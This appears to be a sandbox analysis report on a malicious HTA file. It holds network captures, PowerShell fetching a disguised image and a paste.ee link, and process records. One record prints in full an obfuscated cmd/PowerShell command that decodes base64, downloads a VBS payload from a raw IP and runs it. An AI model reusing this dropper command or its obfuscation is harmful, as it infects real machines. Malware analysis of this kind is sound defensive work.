Dec 20, 2024 16:34:50.826127052 CET	1236	IN	Data Raw: 41 72 72 61 79 28 20 5f 0d 0a 20 20 20 20 20 20 20 20 22 25 73 5c 25 73 22 2c 20 70 72 6f 6a 65 63 74 46 6f 6c 64 65 72 2c 20 73 75 69 74 65 46 6f 6c 64 65 72 20 5f 0d 0a 20 20 20 20 29 29 0d 0a 20 20 20 20 46 6f 72 20 45 61 63 68 20 66 69 6c 65 Data Ascii: Array( _ "%s\%s", projectFolder, suiteFolder _ )) For Each file In fso.GetFolder( path ).Files If bitCancel And SuiteResult( file ) Then ClearFeedback Exit Sub End If Next
Dec 20, 2024 16:34:50.826139927 CET	1236	IN	Data Raw: 47 65 6e 73 29 0d 0a 20 20 20 20 20 20 20 20 69 74 65 6d 20 3d 20 66 73 6f 2e 47 65 74 41 62 73 6f 6c 75 74 65 50 61 74 68 4e 61 6d 65 28 61 44 6f 63 47 65 6e 73 28 69 29 29 0d 0a 20 20 20 20 20 20 20 20 49 66 20 72 65 71 43 6f 6e 66 69 72 6d 43 Data Ascii: Gens) item = fso.GetAbsolutePathName(aDocGens(i)) If reqConfirmChkBox.checked Then response = MsgBox(format(Array("Run %s?", item)), settings, caption) Else response = vbYes End If If v
Dec 20, 2024 16:34:50.944963932 CET	1236	IN	Data Raw: 49 66 0d 0a 20 20 20 20 41 77 61 69 74 4e 65 78 74 49 74 65 6d 0d 0a 45 6e 64 20 53 75 62 0d 0a 0d 0a 53 75 62 20 4f 70 65 6e 47 69 74 0d 0a 20 20 20 20 44 69 6d 20 69 20 27 69 6e 74 65 67 65 72 0d 0a 20 20 20 20 44 69 6d 20 72 65 73 75 6c 74 20 Data Ascii: If AwaitNextItemEnd SubSub OpenGit Dim i 'integer Dim result 'integer: response to MsgBox Dim gitWasFound 'boolean: indicates whether any Git executables were found. gitWasFound = False If Not openGitChkBox.

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	151.101.1.137	443	2492	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 15:34:57 UTC	127	OUT	GET /dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg HTTP/1.1 Host: res.cloudinary.com Connection: Keep-Alive
2024-12-20 15:34:58 UTC	834	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2676697 Content-Type: image/jpeg Etag: "e5745d252aadd8dc5931363c7261f0a8" Last-Modified: Mon, 16 Dec 2024 02:14:05 GMT Date: Fri, 20 Dec 2024 15:34:58 GMT Strict-Transport-Security: max-age=604800 Cache-Control: public, no-transform, immutable, max-age=2592000 Server-Timing: cld-fastly;dur=247;cpu=61;start=2024-12-20T15:34:58.068Z;desc=miss,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2676697,format=\"jpg\",o=1,crt=1734315244,ef=(17)",cloudinary;dur=175;start=2024-12-20T15:34:58.133Z Server: Cloudinary Timing-Allow-Origin: * Access-Control-Allow-Origin: * Accept-Ranges: bytes X-Content-Type-Options: nosniff Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options x-request-id: 70d4331ee42414ff46f04161fd976324
2024-12-20 15:34:58 UTC	1378	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-12-20 15:34:58 UTC	1378	IN	Data Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1\|\;,#o
2024-12-20 15:34:58 UTC	1378	IN	Data Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b Data Ascii: "t-&/{mO\| mv%sb_4{fIj[hutzq\|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
2024-12-20 15:34:58 UTC	1378	IN	Data Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9 Data Ascii: fmKfa&#ps5]&wde&\|W,o!p{bl n13D9\|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
2024-12-20 15:34:58 UTC	1378	IN	Data Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7 Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG\|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
2024-12-20 15:34:58 UTC	1378	IN	Data Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
2024-12-20 15:34:58 UTC	1378	IN	Data Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07 Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
2024-12-20 15:34:58 UTC	1378	IN	Data Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 Data Ascii: Iv14jpIF.UbX$Yi\|QUB81k}w1"eP}0cQ!KAN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
2024-12-20 15:34:58 UTC	1378	IN	Data Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a Data Ascii: Ux+,NG)UeUefI"w-n2^2@%2idutDCH=$WsSw4]GI@~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk>BDoGJp+m+{
2024-12-20 15:34:58 UTC	1378	IN	Data Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)\|jXmsf9 `we!6q{PG\|$iar_LNb#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	104.21.84.67	443	2492	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 15:35:24 UTC	67	OUT	GET /r/muVvq/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
2024-12-20 15:35:24 UTC	586	IN	HTTP/1.1 403 Forbidden Date: Fri, 20 Dec 2024 15:35:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yfi3Tv6rtjN5mf5d%2BfkqHAM7hpotiFERKdd0TXUcwvZxpFK%2B1Gd%2FI%2FP0f8HwGEexb8DEzJAWdNnMxzOMlO%2BrfwwfudCVxzs0ynRLCELO2Eow8gKdoaHuLJ%2Bz%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f50b3b9987f428f-EWR alt-svc: h3=":443"; ma=86400
2024-12-20 15:35:24 UTC	783	IN	Data Raw: 31 31 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 11ca<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-12-20 15:35:24 UTC	1369	IN	Data Raw: 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 Data Ascii: yles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cooki
2024-12-20 15:35:24 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 Data Ascii: <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a>
2024-12-20 15:35:24 UTC	1041	IN	Data Raw: 74 6f 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d Data Ascii: ton" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-
2024-12-20 15:35:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	10:34:43
Start date:	20/12/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta"
Imagebase:	0x4e0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:34:43
Start date:	20/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" "/C PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:34:43
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:34:44
Start date:	20/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
